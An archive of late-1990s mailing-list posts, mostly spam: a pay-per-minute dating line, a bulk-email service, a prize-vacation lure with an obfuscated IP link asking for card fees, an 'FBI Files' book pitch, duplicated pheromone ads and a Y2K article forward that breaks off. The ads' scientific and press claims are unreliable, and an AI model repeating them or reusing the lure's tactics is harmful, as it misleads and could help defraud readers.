Are you looking for love,marriage or just someone to have fun?

Men and woman who could share your own interest are waiting

to hear from you!  match yourself with the right person!

thousands of single peoples wants to hear you!

and you can talk with people of your area!

don't feel lonely anymore!

just call the greatest date line in america! 

10 minutes free of charge when you call!

call now!

1-900-745-8278
1-800-939-8355 (credit card)

only $2.99 per minute,no minimum.
must be 18+ to call.	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fjd8@giulietta.logikos.it
Date: Mon, 21 Dec 1998 20:47:53 -0800 (PST)
To: user@the-internet
Subject: hi
Message-ID: <199812220440.FAA01696@giulietta.logikos.it>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1240
Lines: 18


Do you know what the number one fact is, that will determine whether your business is a success or not?  ADVERTISING! Effective conventional advertising is quite expensive.  So what do you do?  Direct email is one of, if not thee most effective method of advertising in the 90's.  You can get your ad out to hundreds of thousands, even millions, for only a fraction of  the cost of traditional advertising.  The wave of future advertising is here, don't miss it  We will send your advert for you.  We have gone through painstaking methods to insure that we have the cleanest and most up to date mailing list on the Internet.   All you have to do is write your ad, we do the rest.


250,000 addresses - $265 (Holiday Special - $199)
350,000 addresses - $315 (Holiday Special - $250)
500,000 addresses - $450 (Holiday Special - $350)
1 million addresses - $800 (Holiday Special - $700)
3 million addresses - $1800 (Holiday Special -$1200)

Holiday specials end on December 31st and normal pricing will resume.  Specials are based on when you make payment not when your ad is sent.  Ad can be sent at anytime as long as payment is made by December 31st, 1998.

For more information or to place an ad call IMC Marketing at (909) 627-3557






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ABDULRAZAQ@aol.com
Date: Tue, 22 Dec 1998 06:45:37 -0800 (PST)
Subject: You Have Won World Class Florida/Caribbean Vacation Package!
Message-ID: <9434159d.367face1@aol.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 2614
Lines: 71


"CONGRATULATIONS"

          

                 PACK YOUR BAGS!

 
You have been selected to ENTER for a World Class Florida/Caribbean Vacation
Package offer!



You Could Be One Of The Lucky Ones! FLORIDA - ST. CROIX - LAS VEGAS GETAWAY!!!
You have been selected to ENTER for a LIMITED TIME ONLY!



FAMILY GETAWAY FOR 2 ADULTS & UP TO 3 CHILDREN, OR 4 ADULTS!

If selected you could enjoy:==>   4 Days 3 Nights in Magical Orlando Florida,
Home of Disney World were you will enjoy the hospitality of The Comfort
Suites. 

==>   Have a BLAST with a Family Pass to WATERMANIA Water Park in Orlando.  As
a Special gift You will also RECEIVE the ORLANDO "MAGIC CARD" Entitling you to
HUNDREDS OF DOLLARS worth of DISCOUNTS in the Orlando area!!!!!!!   
 
==>   Then enjoy 3 days 3 nights in Sunny Cocoa Beach Florida living it up at
the Atlantic Beach Resort overlooking the Atlantic Ocean!!!  While there enjoy
2 ADULT CASINO CRUISE TICKETS as a gift from us!

==>   An Alamo Rental Car with unlimited mileage for your stay in Florida. All
of this for only $11* Per Day Per Persom  for 4 adults or 2 adults and up to 3
children - IF You Are Selected!
 
(If you do qualify you will need to secure promotional fees on a major credit
card to guarantee your travel date and toobtain your free rental car) REGISTER
NOW AND IF YOU QUALIFY WE WILL ALSO INCLUDE THE TWO FOLLOWING VACATIONS AT NO
ADDITIONAL COST:

 ==>  3 DAYS 2 NIGHTS in beautiful Las Vegas, Nevada, and you will be staying
on the fabulous strip!          

==>  4 DAYS 3 NIGHTS in St. Croix in the Virgin Islands

(These Two Additional Mini-Vacations will be offered for a limited time) SO
HURRY .... REGISTER NOW TO SEE IF YOU QUALIFY!
------------------------------------------------------------------------------
-------------
TO  REGISTER Enter The URL Below Into Your Web Browser:
http://3456968599/userap/tr/nt.html

------------------------------------------------------------------------------
-------------------------

This is NOT a Contest, Lottery, or Sweepstakes. You are qualified based on
demographics such as age, area you live in, etc. Qualified Entrants will be
contacted by one of our Experienced Travel Representatives with the full
details, ONLY ONE PHONE CALL PER HOUSHOLD. (All fields must be filled out
completely in order to be a valid entry. This info will remain completely
confidential!) * This covers all fees except for any incidentals such as
phone, food, gratuities, and hotel taxes which are paid directly to the hotel.



To Be Removed Send E-Mail To userap@spdy.com With "Delete" In Subject
Line!>!>Subject Line!>!>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 22 Dec 1998 20:02:56 -0800 (PST)
To: "jf_avon@citenet.net>
Subject: [humor] Fwd: Computer News
Message-ID: <199812230409.XAA15192@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 294
Lines: 15


==================BEGIN FORWARDED MESSAGE==================
>Subject: Computer News
>Date: Tue, 22 Dec 1998 20:11:42 -0800

Microsoft announced this week that due to Y2K problems, Windows 2000
will be delayed until Jan, 1901.

===================END FORWARDED MESSAGE===================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fbi.files@usa.net
Date: Thu, 24 Dec 1998 18:33:47 -0800 (PST)
To: unique_info@your.files
Subject: Get Your FBI Files!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 9635
Lines: 158


Are you now or have you ever been in the FBI files?

The answer is, most likely, Yes!  Just about everyone has their own FBI file.

How do we know?  The authors did research under the Freedom of Information Act.  It shows that government agencies do not like being held accountable to the public and resist the efforts of citizens who seek information about their activities.

>>>>>>>>Starting Dec. 4, 1998, we are running a TV commercial nationwide for the following offer.  If you snooze, you will lose!  You will also see our ad in newspapers and hear it on the radio.  We expect, at some point, the FBI will knock on our door and tell us to stop selling the book because they are getting too many inquiries.  The huge demand will make it difficult for latecomers to obtain their FBI files.


First about the FBI filing system.  It was created to deter anybody from getting full information.  The FBI uses many record systems.  They created what is called "Main Files" with four classifications:
	* Personal
	* Administrative
	* Applicant (for government employees)
	* Investigative
To further confuse us, the FBI created 210 classification numbers besides the files called "Confidential," "Secret," and "Top Secret."  Here are some of the classification numbers and the categories they stand for:
	#3 - Overthrow or Destruction of the Government
	#5 - Income Tax
	#17 - Veteran Administration Matters
	#23 - Prohibition (Maybe your Grandfather is here.)
	#40 - Passport and Visa Matters
	#47 - Impersonation
	#49 - National Bankruptcy Act
	#64 - Foreign (This one is interesting.  Intelligence information about citizens of foreign countries!)
	#72 - Obstruction of Criminal Justice
	#85 - Home Owner Loan Corporation
	#162 - Interstate Gambling Activities
	#183 - Racketeer-Influenced and Corrupt Organizations (You know this one -- RICO.)
	 
	
There is a specific system of numbering documents.  It was not easy for the investigative team to decipher and decode how the numbering relates to everyone.  Your FBI ID number most likely consists of three sets of numbers. For example:  100-15375-17
	100 - marks the document as part of a domestic security investigation.
	15375 - indicates the document investigation number.  These two sets of numbers together creates a "case number."
	17 - a numeric labeling, but to confuse everyone, it could be an incoming or outgoing document.


But, we have the solution.  An awesome publication, "FBI Files,"  is now available.  As a bonus, we created a letter for you which covers all possible requests so none of the information is missing when you get your file.

Here is how it works.  If you don't ask for it, you don't get it.  That's a LAW!  But, if you know what to ask for, you MUST get it.  That's also a LAW! Our researchers spent twenty years just uncovering what to ask for.

Today, if you ask for your file without being specific, you may be brushed off with questions as to which main file, subfile,  or some very strange, cryptic language and code names such as "Elsurs Logs," "MISUR," "TESUR," "FOIA," Document Classification Reveiw Unit known as "CRU," and so on.

Who has an FBI file?
	* All Criminals
	* Organized Crime Members
	* Government Employees
	* Celebrities
	* Foreigners who became U.S. Citizens
	* All Foreigners with Green Cards
	* Foreign Nationals	
	* Members of Interest Groups
	* Everyone involved in Counter-Intelligence
	* Black Nationalist hate groups
	* Internal Security
	* All Politicians
	* Everyone with any kind of Police Record
	* All Professionals who are fingerprinted for a specific profession -- example, Real Estate Agents
	* All Fugitives
	* Computer Hackers and Flamers

We believe that everyone today has an FBI file and that your future National ID # is going to be your FBI File number!

The book, "FBI Files," gives you detailed information on how you can obtain all files the FBI has on you.  It will also give you information how to obtain the FBI files of other people. The FBI will not release these voluntarily.  You may have to jump through some hoops to get them.  But, under the Freedom of Information Act, you are entitled to get ANY information unless it is subject to national security.

When you receive your files you may be shocked to learn that your local police have a wiretap and surveillance on you.  You find out your neighbor is an FBI informant.  You may even find out your trash was picked up by the FBI and derogatory information was put in your file.

If you ever attended a "politically incorrect" meeting or political rally, you may find your picture in your file. Or if you purchased a book or magazine considered "underground," that information may be in your file. Or your neighbor may have heard you listening to a talk show considered "politcally incorrect" and may have reported you to the authorities.

Does this sound far-fetched?  We wish!  Things like this are happening every day.

Why do you NEED your FBI files?  Your future job or promotion may depend on the information contained in those files!  It is a MUST for you to obtain your files and correct any and all incorrect information before it affects your life!

NOW is the time to order.............................

"FBI Files" is 226 pages of detailed information and instructions. When you read your own FBI files, you may be shocked to learn that your local police have a wiretap and surveillance on you.  You may find out your neighbor is an informant.  You may even find out your garbage was picked up by the FBI and derogatory information put in your file.  By the way, if you find any derogatory information which is not yours but appears in your file, you can sue the government for huge sums of money!


Procrastination on your part may just keep you from being able to get YOUR FBI FILES!  Order now and avoid the rush.
--------------------------------------------------------------------------

Here is how to order:


Our "FBI Files" package is being offered at the Special Promotion price of $24.95 which includes shipping and handling by Priority Mail ($9.95).  You should receive your book within 7-10 days from receipt of order.  

.......Here are the BONUSES for you........
  *You will receive a letter created by our Research Dept. in which you just fill in your Name, Address, Social Security Number, and start searching for your file or files.  Depending on who you are and what may be in your file will be the measurement of how long it will take to receive all the information.  But, eventually, YOU WILL SUCCEED!

  *You will also receive an updated list of FBI field offices in the United States with their addresses.

  *We will also include a special folder in which you can store your information.



You can send us a check (takes at least 5 business days to clear) or money order.  We also accept all major Credit Cards:  Visa, MasterCard, American Express, and Discover. 


Print out the convenient order form below NOW and mail it to:

	World Net Press
	Dept. E-1224
	P.O. Box 96594
	Las Vegas, NV 89193-6594
	
Payment Method:  
_____ Check     
_____ Money Order
_____ Visa
_____ MasterCard
_____ American Express
_____ Discover

_____ Yes, I want to order my copy of the "FBI Files Package" which includes the Bonus letter I can send to the FBI, the updated list of FBI Field Offices, and a special folder for storing my information.  Price is $24.95 which includes shipping and handling by Priority Mail($9.95) and bonuses.


Name_________________________________________________________________________

Address______________________________________________________________________

City/State/Zip_______________________________________________________________

Daytime Phone (__________)___________________________________________________

E-Mail Address_______________________________________________________________

Credit Card #_____________________________________________ Exp. Date_________

Cardholder Name (as it appears on the card)__________________________________

(Please make sure you include your phone number and e-mail address in case we have a question about your order.  Your credit card billing will reflect Road to Wealth, Inc.)

If you are unhappy with "FBI Files," just return the book within 30 days of date of purchase and we will refund the price of the book less shipping and handling and a restocking fee of 15%.



>>>>>>We have many publications and videos with thought-provoking titles available.  If you would like more information, please reply to this message and type MORE INFO in the subject line.  Thank you. >>>>>>>>>>>>>>>>



**************************************************************************
You are receiving this e-mail for one of the following reasons:
a) You are interested the subjects we have to offer.
b) You are on our in-house mailing list.
c) You sent us your offer or contacted us in the past.
d) Someone you know has sent us your e-mail address because they thought you may be interested in what we have to offer.

If this message has reached you in error, or the information is not correct, please accept our apology.  Follow the instructions below to be removed and we will honor your request.  We do not knowingly engage in spam of any kind.

Please click on your reply button and type REMOVE in the SUBJECT LINE ONLY.  The software ignores any message in the body.
**************************************************************************

Please be advised we collect the e-mail addresses of all flamers, hackers, and users of abusive and vulgar language.  We submit these addresses to the FBI and Interpol on a monthly basis.  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bettyrubble@193.230.240.21
Date: Sat, 26 Dec 1998 09:52:36 -0800 (PST)
To: Clintongirl@193.230.240.21
Subject: Ecstasy, The means & the way to a true orgasm!
Message-ID: <199812261749.RAA15970@ns0.telegraph.co.uk>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 9343
Lines: 141


BOOST YOUR SEX APPEAL AND CHANGE YOUR SOCIAL AND SEX LIFE FOREVER. 

SCIENCE AND NATURE'S SEXUAL SECRET WEAPON! 

Scientists have isolated the natural Human male/female Pheromone attractants 
and they are NOW available to YOU, legally, in the US. 

ATTRACT THE OPPOSITE SEX LIKE NEVER BEFORE ! 
IT'S GUARANTEED, or you pay nothing! 


PHEROMONES in the News! 

>From the NY Times to the LA Times. USA Today, The Wall Street Journal, Psychology Today, 20/20, Hard Copy, Single Living, Medical Tribune, Philadelphia Inquirer, Dateline, Discovery, Hustler, Playboy, Rocky Mountain News, McCalls, Penthouse, Cosmopolitan, BBC-TV, Colordao Telegraph, GQ, Time, Redbook, Fortune Magazine, and more.  Radio and Television Stations worldwide.  All have reported the scientific findings amidst excitement, controversy, commotion and thrill about pheromones and their potential use. 


The Press Has Said it Better Than We Can. 

"PUT IT TO THE TEST" MERIDIAN TV: 
Sold extensively in the UK, phermomones were tested live on television in the UK, when the unknowing female presenter was VERY ATTRACTED to one of the twin guys,  he was wearing "Androstenone Pheromone"  but she did not know this, and did not know why she was attracted to him ! 

US NEWS and WORLD REPORTS 
"The key to starting a love affair might be right under your nose. Scientists have just announced the discovery of a virtual sixth sense, a tiny organ in the nasal cavity that responds to chemicals known as pheromones. These natural substances are thought to play a role in basic human emotions such as fear, hunger--and love." 
FORTUNE MAGAZINE:  
"An imaginative University of Utah anatomist named David L. Berliner was working with substances that occur in human skin. When he left some of the extracts in open vials around the lab, he noticed a sudden, puzzling rise in camaraderie among a previously acrimonious group of researchers working with him. When he changed the extracts a 
few months later, the group resumed its contentious ways. Berliner froze and saved the extracts. 
Nearly 30 years later, ...  thanks to a method of containing drugs and cosmetics inside tiny, spongelike polymer spheres, he returned to the subject. In 1989 he ... has isolated the suspected good-fellowship pheromones -- behavior-controlling substances similar to those already known to stimulate sexual activity in animals. (One whiff of a pheromone called aphrodisin from a female hamster and a male is ready to mate.) 

On March 3, 1998 FOX Affiliate, WSVN in Miami did a story on Pheromones, stating, "If you're looking for love, we've got a potion for passion." ...  "Tonight, a secret weapon to attract the opposite sex.  Researchers developing their own passion potion. Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 

Customers Say: 

"... works as advertised, best product of its' kind" 

I've always had trouble meeting women-then I tried your product.  Now girls come up to me and introduce themselves all the time! I'd like to know if your product is available in a larger quantity so I can make sure I'm never without it! 
-Dave J 

I've been driving a tractor trailer for about 6 years and I'm on the road all the time. It's been impossible to meet women until I tried pheromones.  Now every truck stop I pull into I meet new women, and many of them ask me out. Thanks! 
-Tom on the Road Again, 

WHAT ARE PHEROMONES? 

Pheromones are a naturally occurring chemical compound found in all insects, all animals, and in humans. When pheromones are secreted they dictate sexual behavior and attract the opposite sex.  Be careful. Animal pheromones do NOT attract humans. 

Have you ever wondered why people who are not particularly attractive seem to attract dates like flies to honey?  They seem to have some "chemical attraction" about themselves. Some call it animal magnetism. It may be pheromones.  Now you can have that "chemical attraction" whenever you want. 

PHEROMONES - THE FACTS 

       Pheromones are natural chemicals which play an important role in sexual communication. 

       Animals, including humans release chemicals in tears, saliva and perspiration. These chemicals send signals relating to mood and health to the subconscious awareness.  One theory is that the dominant male will exude more of these chemical attractants than a submissive or weaker male.  This chemical attracts more females to him.  It is similar for woman attracting men. This natural attractant can also contribute to more 
intense excitement during love making (sexual foreplay and sexual intercourse). Pheromones may also contribute to the dating phrase, "chemical attraction" that we all talk about.  WSVN-TV (March 3, 1998) "Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 


MORE RESEARCH AND REFERENCES: 
Following is some research done on products made by our manufacturer, and bottled under a different name.  It contains the same pheromone type and content as Hi-Octane
http://www.angelfire.com/fl/beaches69/index.html 



ABOUT OUR PRODUCT: 

Hi-Octane (tm) 

.. is made up of PHEROMONES suspended in witch hazel.. This product is designed to be added to your favorite cologne or perfume. 

.. contains both male and female PHEROMONES. Nature never intended for 
just one PHEROMONE to be present; but two, male and female. Our manufacturering process uses both PHEROMONES in ALL our products. This will not attract same sex; 
but works as nature intended, attracting the opposite sex. 

.. comes in 1/8 oz. Bottle with a small funnel so you can easily pour it into 
your cologne or perfume. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of 
your favorite perfume product.  

Similar pheromone products have been sold for up to $100 elsewhere. We sell the the strongest product on the market today for only $39.95. 

BUY two -- get one free. 

The world's largest manufacturer of Pheromones, MC Marble, now manufactures Hi-Octane (tm), a pheromone prodcut that is the "Most Powerful sexual attractant on the Market today." 

HI_OCTANE is made with two powerful synthesized human 
pheromones, Alpha-Androstenol and Alpha-Androstenone. 

HI-OCTANE  will attract the opposite sex of the wearer.  McCall's magazine writes 
"...pheromones can improve one's love life, pheromones send out subconscious 
scent signals to the opposite sex that naturally trigger romantic feelings." 

HI-OCTANE  according to the manufacturer, may also intensify sex, by increasing sexual pleasure and endurance of both partners, and creating a higher sexual ecstasy. Individual results may vary.   One private study claims that pheromones don't work for everyone. 75% of those trying it had success.  Isn't it worth trying? 

HOW TO ORDER Hi OctaneTM 

Hi OctaneTM is available from Euphoria Products. 

A 1/8 oz. bottle with a convenient funnel (to be added to your favorite perfume) is 
$39.95. Mix 1/4 of the bottle with every 2 oz of your favorite product. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of your favorite product. 

                         *** 

  For a limited time, when you order two bottles (up to a two month's supply) of Hi Octane(tm), you'll get a third bottle ABSOLUTELY FREE. 

                         *** 

Please add $3.00 shipping and handling per order. (regardless of how many bottles you order, you pay only $3.00 total!) 

UPS Second Day Air Delivery is available for an additional $9.00 per order.  Overnight, add $15.00 per order. 

Florida residents, please add applicable sales tax. 

For orders from outside of the US only ground shipping is available for $15. 

Our manufacturing facility offers the STRONGEST pheromones on the market today. Our manufacturing facility assures you that Hi-Octane will be always contain the male and female pheromones, the way nature intended it, to best attract the opposite sex for you. It is and will always be manufactured with the finest ingredients to assure your satisfaction. 



                        SATISFACTION GUARANTEED 

Try Hi OctaneTM risk-free. Your satisfaction is unconditionally guaranteed. If you do not find you are meeting and dating and scoring with more people of the opposite sex after using High OctaneTM for 30 days, simply return the unused portion of your order at any time for a full refund--no questions asked. 



Call 520-453-0303 Extension 202,  24 hours/day, 7 days/week for credit card orders. Have your MasterCard, Visa, American Express, and Discover Card  ready and say, " I would like to order ___ bottles of High Octane." 

If you would like to order by mail, you can send in a check or money order, or credit card information,  along with your name and street address (no PO Boxes please) and a day time phone number to: 

                         Euphoria Products Dept. 202 
                    1859 No Pine Island Rd. Suite #133
                            Plantation, FL 33322 






The Mailing List that you are being mailed from was filtered against
a Global Filter List. If you would like not to recieve any other mailings of this type please call: 1-888-745-6328






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: swedegirl@193.230.240.21
Date: Sat, 26 Dec 1998 09:53:20 -0800 (PST)
To: Clintongirl@193.230.240.21
Subject: Have you been married a long time, Spice it up!
Message-ID: <199812261748.BAA08405@ns>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 9343
Lines: 141


BOOST YOUR SEX APPEAL AND CHANGE YOUR SOCIAL AND SEX LIFE FOREVER. 

SCIENCE AND NATURE'S SEXUAL SECRET WEAPON! 

Scientists have isolated the natural Human male/female Pheromone attractants 
and they are NOW available to YOU, legally, in the US. 

ATTRACT THE OPPOSITE SEX LIKE NEVER BEFORE ! 
IT'S GUARANTEED, or you pay nothing! 


PHEROMONES in the News! 

>From the NY Times to the LA Times. USA Today, The Wall Street Journal, Psychology Today, 20/20, Hard Copy, Single Living, Medical Tribune, Philadelphia Inquirer, Dateline, Discovery, Hustler, Playboy, Rocky Mountain News, McCalls, Penthouse, Cosmopolitan, BBC-TV, Colordao Telegraph, GQ, Time, Redbook, Fortune Magazine, and more.  Radio and Television Stations worldwide.  All have reported the scientific findings amidst excitement, controversy, commotion and thrill about pheromones and their potential use. 


The Press Has Said it Better Than We Can. 

"PUT IT TO THE TEST" MERIDIAN TV: 
Sold extensively in the UK, phermomones were tested live on television in the UK, when the unknowing female presenter was VERY ATTRACTED to one of the twin guys,  he was wearing "Androstenone Pheromone"  but she did not know this, and did not know why she was attracted to him ! 

US NEWS and WORLD REPORTS 
"The key to starting a love affair might be right under your nose. Scientists have just announced the discovery of a virtual sixth sense, a tiny organ in the nasal cavity that responds to chemicals known as pheromones. These natural substances are thought to play a role in basic human emotions such as fear, hunger--and love." 
FORTUNE MAGAZINE:  
"An imaginative University of Utah anatomist named David L. Berliner was working with substances that occur in human skin. When he left some of the extracts in open vials around the lab, he noticed a sudden, puzzling rise in camaraderie among a previously acrimonious group of researchers working with him. When he changed the extracts a 
few months later, the group resumed its contentious ways. Berliner froze and saved the extracts. 
Nearly 30 years later, ...  thanks to a method of containing drugs and cosmetics inside tiny, spongelike polymer spheres, he returned to the subject. In 1989 he ... has isolated the suspected good-fellowship pheromones -- behavior-controlling substances similar to those already known to stimulate sexual activity in animals. (One whiff of a pheromone called aphrodisin from a female hamster and a male is ready to mate.) 

On March 3, 1998 FOX Affiliate, WSVN in Miami did a story on Pheromones, stating, "If you're looking for love, we've got a potion for passion." ...  "Tonight, a secret weapon to attract the opposite sex.  Researchers developing their own passion potion. Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 

Customers Say: 

"... works as advertised, best product of its' kind" 

I've always had trouble meeting women-then I tried your product.  Now girls come up to me and introduce themselves all the time! I'd like to know if your product is available in a larger quantity so I can make sure I'm never without it! 
-Dave J 

I've been driving a tractor trailer for about 6 years and I'm on the road all the time. It's been impossible to meet women until I tried pheromones.  Now every truck stop I pull into I meet new women, and many of them ask me out. Thanks! 
-Tom on the Road Again, 

WHAT ARE PHEROMONES? 

Pheromones are a naturally occurring chemical compound found in all insects, all animals, and in humans. When pheromones are secreted they dictate sexual behavior and attract the opposite sex.  Be careful. Animal pheromones do NOT attract humans. 

Have you ever wondered why people who are not particularly attractive seem to attract dates like flies to honey?  They seem to have some "chemical attraction" about themselves. Some call it animal magnetism. It may be pheromones.  Now you can have that "chemical attraction" whenever you want. 

PHEROMONES - THE FACTS 

       Pheromones are natural chemicals which play an important role in sexual communication. 

       Animals, including humans release chemicals in tears, saliva and perspiration. These chemicals send signals relating to mood and health to the subconscious awareness.  One theory is that the dominant male will exude more of these chemical attractants than a submissive or weaker male.  This chemical attracts more females to him.  It is similar for woman attracting men. This natural attractant can also contribute to more 
intense excitement during love making (sexual foreplay and sexual intercourse). Pheromones may also contribute to the dating phrase, "chemical attraction" that we all talk about.  WSVN-TV (March 3, 1998) "Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 


MORE RESEARCH AND REFERENCES: 
Following is some research done on products made by our manufacturer, and bottled under a different name.  It contains the same pheromone type and content as Hi-Octane
http://www.angelfire.com/fl/beaches69/index.html 



ABOUT OUR PRODUCT: 

Hi-Octane (tm) 

.. is made up of PHEROMONES suspended in witch hazel.. This product is designed to be added to your favorite cologne or perfume. 

.. contains both male and female PHEROMONES. Nature never intended for 
just one PHEROMONE to be present; but two, male and female. Our manufacturering process uses both PHEROMONES in ALL our products. This will not attract same sex; 
but works as nature intended, attracting the opposite sex. 

.. comes in 1/8 oz. Bottle with a small funnel so you can easily pour it into 
your cologne or perfume. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of 
your favorite perfume product.  

Similar pheromone products have been sold for up to $100 elsewhere. We sell the the strongest product on the market today for only $39.95. 

BUY two -- get one free. 

The world's largest manufacturer of Pheromones, MC Marble, now manufactures Hi-Octane (tm), a pheromone prodcut that is the "Most Powerful sexual attractant on the Market today." 

HI_OCTANE is made with two powerful synthesized human 
pheromones, Alpha-Androstenol and Alpha-Androstenone. 

HI-OCTANE  will attract the opposite sex of the wearer.  McCall's magazine writes 
"...pheromones can improve one's love life, pheromones send out subconscious 
scent signals to the opposite sex that naturally trigger romantic feelings." 

HI-OCTANE  according to the manufacturer, may also intensify sex, by increasing sexual pleasure and endurance of both partners, and creating a higher sexual ecstasy. Individual results may vary.   One private study claims that pheromones don't work for everyone. 75% of those trying it had success.  Isn't it worth trying? 

HOW TO ORDER Hi OctaneTM 

Hi OctaneTM is available from Euphoria Products. 

A 1/8 oz. bottle with a convenient funnel (to be added to your favorite perfume) is 
$39.95. Mix 1/4 of the bottle with every 2 oz of your favorite product. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of your favorite product. 

                         *** 

  For a limited time, when you order two bottles (up to a two month's supply) of Hi Octane(tm), you'll get a third bottle ABSOLUTELY FREE. 

                         *** 

Please add $3.00 shipping and handling per order. (regardless of how many bottles you order, you pay only $3.00 total!) 

UPS Second Day Air Delivery is available for an additional $9.00 per order.  Overnight, add $15.00 per order. 

Florida residents, please add applicable sales tax. 

For orders from outside of the US only ground shipping is available for $15. 

Our manufacturing facility offers the STRONGEST pheromones on the market today. Our manufacturing facility assures you that Hi-Octane will be always contain the male and female pheromones, the way nature intended it, to best attract the opposite sex for you. It is and will always be manufactured with the finest ingredients to assure your satisfaction. 



                        SATISFACTION GUARANTEED 

Try Hi OctaneTM risk-free. Your satisfaction is unconditionally guaranteed. If you do not find you are meeting and dating and scoring with more people of the opposite sex after using High OctaneTM for 30 days, simply return the unused portion of your order at any time for a full refund--no questions asked. 



Call 520-453-0303 Extension 202,  24 hours/day, 7 days/week for credit card orders. Have your MasterCard, Visa, American Express, and Discover Card  ready and say, " I would like to order ___ bottles of High Octane." 

If you would like to order by mail, you can send in a check or money order, or credit card information,  along with your name and street address (no PO Boxes please) and a day time phone number to: 

                         Euphoria Products Dept. 202 
                    1859 No Pine Island Rd. Suite #133
                            Plantation, FL 33322 






The Mailing List that you are being mailed from was filtered against
a Global Filter List. If you would like not to recieve any other mailings of this type please call: 1-888-745-6328






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clinical27a@usm.edu
Date: Sun, 27 Dec 1998 17:34:52 -0800 (PST)
To: clinical27a@usm.edu
Subject: ABCReport:1st Aphrodisiac Drug Appr
Message-ID: <199812280131.SAA03455@lewis.mt.net>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 734
Lines: 39


The announcement of this scientific breakthrough,
has set off a media fire-storm.  In the last few days,
the remarkable qualities of Androstenone Pheromones
have been featured in every major publication,
newspaper, national magazine, and television magazine.
>From 20/20, Hard Copy, and Dateline NBC, to the N.Y.
Times, and the American Journal of Modern Medicine.

Several independent research institutes have concluded
studies on the benefits of Androstenone (You may have
heard about the most recent study on CNN.)

TO READ MORE ABOUT THIS REVOLUTIONARY
MEDICAL DISCOVERY and the CNN REPORT
go to our new sites at :



http://www.angelfire.com/on/aphrod7501/


****
OR
****



http://www.nettaxi.com/citizens/aphrod7501











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Moore <CarolMoore@kreative.net>
Date: Mon, 28 Dec 1998 18:56:15 -0800 (PST)
To: "Mis. List" <carolmoore@kreative.net>
Subject: Y2K War Games & Martial Law articles
Message-ID: <36884349.1B902534@kreative.net>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 14139
Lines: 340


Below are two recent articles to remind libertarians,et al that the feds
are
already planning "war games" in June for potential problems in year 2000

as well as discussing martial law.  (All planned by the same President,
Attorney General, ATF/FBI, and military who gave us Waco,
Iraq sanctions, and the Sudan and Iraq bombings.)   Carol in D.C.
http://www.kreative.net/carolmoore/community-y2k.html

(PS.  Demand Clinton the rapist (see http://www.newsmax.com)
resign.  202-456-1111  or President@whitehouse.gov)

(A good source for daily mainstream press articles on Y2K is:
http://www.year2000.com/articles/articles)
-----------
12-24-98
Government plans war games to battle Millennium Bug
  By Lisa Hoffman / Scripps Howard News Service
 WASHINGTON -- The federal government is
   gearing up for top-level war games designed to
   grapple with possible calamities the "millennium bug"
   might wreak in the United States and abroad.
 The "tabletop exercise," as it's being called, will
   mark the first time since the end of the Cold War that
   Cabinet secretaries have assembled to plot responses
   to what could be a nationwide crisis.
 Clinton administration officials say they expect any
   disruptions that might result from computer confusion
   when 2000 dawns will be minor. But they want to
   make sure the government is prepared should that
   forecast be wrong.
 Planning for the war games, tentatively scheduled
   for June, is in its early stages, so officials can't say
   which Cabinet secretaries will take part, how long the
   exercises will last or what mock disaster scenarios the
   leaders will be wrestling with.
 According to administration officials, those almost
   certain to participate are Defense Secretary William
   Cohen, Health and Human Services Secretary Donna
   Shalala, Attorney General Janet Reno, Energy
   Secretary Bill Richardson, Transportation Secretary
   Rodney Slater and Jamie Lee Witt, the director of the
   Federal Emergency Management Agency, which is
   taking a lead role in preparing for any year 2000, or Y2K, glitches.
 Governments, from the city and county level up, are racing to make sure
their
   tens of thousands of vital systems will not fall prey to a
programming problem
   that might cause computers to misinterpret the turn of the century on
Jan. 1,
   2000, and shut down or otherwise fail.
 Given the proliferation of computer chips in everything from traffic
signals to
   medical devices to air traffic control towers, significant
disruptions in vital
   services are at least theoretically possible.
 The administration wants to be able to respond rapidly if those occur.
One
   major focus of the war games is expected to be on how to coordinate a

   response.
 At least one other high-level war game is slated at the Pentagon, where
the
   top brass along with Cohen will gather to brainstorm sometime between
March
   and the national exercise in June, according to Pentagon officials.
 Their focus won't be so much on handling defense computer foul-ups --
for
   which a massive preparatory fix now is underway -- as on how the
armed forces
   might be able to help communities in which they are based cope with a
crisis,
   particularly those overseas.
 If, for instance, the electrical power fails in Ramstein, Germany,
troops at the
   U.S. Air Force Base there could provide generators to help restore
the power,
   officials said.
 (Lisa Hoffman covers military affairs for Scripps Howard News Service.
   E-mail hoffmanl(at)shns.com.)
----------------
Found at:
http://www.worldnetdaily.com/bluesky_exnews/19981221_xex_un_plans_glo.shtml

MONDAY    DECEMBER 211998

PANIC IN THE YEAR ZERO
U.N. plans for global chaos
Bennett says no plans in U.S. for martial law

Editor's note: This is the second of a two-part series
on the Y2K millennium bug based on an exclusive
interview with Sen. Robert Bennett, R-UT, and the
chairman of the Senate committee investigating the
